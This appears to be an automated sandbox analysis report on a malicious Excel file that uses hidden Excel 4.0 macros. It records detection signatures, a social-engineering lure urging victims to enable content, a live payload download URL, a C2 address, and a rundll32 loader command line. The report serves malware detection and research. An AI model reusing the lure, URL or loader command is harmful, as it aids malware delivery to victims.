Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.15528.xls

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.15528.xls
Analysis ID:356212
MD5:5a75c6184001a6b8785206f1e2121290
SHA1:b3ec9fbcc5e96c45e74d503210a51a7ee5ce8132
SHA256:c71bd3833fbb10cd2f845c83a6ed957f3243990de48a74b4d5cf1602303f4bb1

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2576 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6196 cmdline: rundll32 ..\rieuro.vnt,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Heur.15528.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x11da3:$e1: Enable Editing
  • 0x11e18:$e2: Enable Content
SecuriteInfo.com.Heur.15528.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x148a2:$s1: Excel
  • 0x15906:$s1: Excel
  • 0x3802:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
SecuriteInfo.com.Heur.15528.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2576, ProcessCommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, ProcessId: 6196

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: SecuriteInfo.com.Heur.15528.xlsVirustotal: Detection: 9%Perma Link

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 139.162.8.120:443 -> 192.168.2.3:49721 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: pg.happyslot88.cc
    Source: global trafficTCP traffic: 192.168.2.3:49721 -> 139.162.8.120:443
    Source: global trafficTCP traffic: 192.168.2.3:49721 -> 139.162.8.120:443
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: pg.happyslot88.cc
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.cortana.ai
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.office.net
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.onedrive.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://augloop.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://cdn.entity.
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://cortana.ai
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://cortana.ai/api
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://cr.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://directory.services.
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://graph.windows.net
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://graph.windows.net/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://login.windows.local
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://management.azure.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://management.azure.com/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://messaging.office.com/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://officeapps.live.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://onedrive.live.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://outlook.office.com/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: SecuriteInfo.com.Heur.15528.xlsString found in binary or memory: https://pg.happyslot88.cc/ds/2202.gif
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://settings.outlook.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://tasks.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownHTTPS traffic detected: 139.162.8.120:443 -> 192.168.2.3:49721 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 13_ @Once You have Enable Editing, please click
    Source: Screenshot number: 4Screenshot OCR: Enable Content" 14 from the yellow bar above 15 16 17 18" WHY I CANNOT OPEN THIS DOCUMENT? 19
    Source: Screenshot number: 8Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "Enable Cont
    Source: Screenshot number: 8Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? wYou are using iOS orA
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
    Source: Document image extraction number: 6Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "Enable Cont
    Source: Document image extraction number: 6Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? WYou are using IDS or
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: SecuriteInfo.com.Heur.15528.xlsInitial sample: EXEC
    Source: SecuriteInfo.com.Heur.15528.xlsOLE indicator, VBA macros: true
    Source: SecuriteInfo.com.Heur.15528.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: SecuriteInfo.com.Heur.15528.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal76.expl.evad.winXLS@3/6@1/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{96F52B34-9FD2-4169-8D1D-D2C4D88D279A} - OProcSessId.datJump to behavior
    Source: SecuriteInfo.com.Heur.15528.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
    Source: SecuriteInfo.com.Heur.15528.xlsVirustotal: Detection: 9%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServerJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
